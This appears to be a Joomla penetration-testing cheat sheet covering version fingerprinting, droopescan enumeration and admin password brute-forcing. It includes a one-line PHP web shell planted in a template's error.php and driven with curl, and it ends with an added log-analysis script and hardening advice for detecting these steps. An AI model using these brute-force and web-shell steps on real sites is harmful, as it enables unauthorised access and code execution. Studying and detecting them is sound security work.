Joomla

Footprinting

# Confirm that the site is running Joomla
curl -s http://site.local/ | grep Joomla

# Fingerprint the Joomla version
curl -s http://site.local/README.txt | head -n 5

curl -s http://site.local/administrator/manifests/files/joomla.xml | xmllint --format -

# cache.xml, located at plugins/system/cache/cache.xml, can give an approximate version.

Enumeration

# Droopescan installation
sudo pip3 install droopescan

# Normal scan
droopescan scan joomla --url http://site.local/

# Brute-forcing the password
# joomla-brute
# Link: https://github.com/ajnik/joomla-bruteforce
sudo python3 joomla-brute.py -u http://site.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

Attacking Joomla

Code Execution

# PHP code to include in the template's error.php page to get code execution
# 'cmd' md5 encoded - dcfdd5e021a869fcc6dfaef8bf31377e
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);

# Using curl to execute commands
curl -s 'http://site.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id'
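
Detection

The requests on this page leave a recognisable trail in the web server's access log. The following is an added example, not part of the original notes: a triage script that flags version-file reads, bursts of administrator login POSTs, and template PHP files requested with a query string. The log lines, IP addresses and the threshold are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Combined-log-format fields used here: client IP, method, URI, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Version-disclosure files named on this page.
FINGERPRINT = ("/README.txt", "/administrator/manifests/files/joomla.xml",
               "/plugins/system/cache/cache.xml")
LOGIN = "/administrator/index.php"
# A PHP file under /templates/ requested directly with a query string.
TEMPLATE_PHP = re.compile(r"^/templates/[^?]+\.php[^?]*\?.")
LOGIN_THRESHOLD = 5  # assumed value; tune to your own traffic

def analyze(log_text):
    """Return {client_ip: sorted list of finding tags} for one log."""
    findings, posts = defaultdict(set), Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, uri, status = m.groups()
        path = uri.split("?", 1)[0]
        if method == "GET" and path in FINGERPRINT and status == "200":
            findings[ip].add("version-fingerprint")
        if method == "POST" and path == LOGIN:
            posts[ip] += 1
        if TEMPLATE_PHP.match(uri):
            findings[ip].add("template-php-with-query")
    for ip, count in posts.items():
        if count >= LOGIN_THRESHOLD:
            findings[ip].add("admin-login-burst")
    return {ip: sorted(tags) for ip, tags in findings.items()}

def _line(ip, method, uri, status=200):
    # Builds one constructed log line for the sample below.
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] '
            f'"{method} {uri} HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample: 10.0.0.5 repeats this page's requests, 10.0.0.9 is normal use.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", "GET", p) for p in FINGERPRINT]
    + [_line("10.0.0.5", "POST", LOGIN)] * 6
    + [_line("10.0.0.5", "GET",
             "/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id"),
       _line("10.0.0.9", "GET", "/index.php?option=com_content"),
       _line("10.0.0.9", "POST", LOGIN)])

if __name__ == "__main__":
    for ip, tags in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

Denying web access to README.txt and the manifest XML files, rate-limiting /administrator/, and monitoring template files for modification address the same three behaviours at the source.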
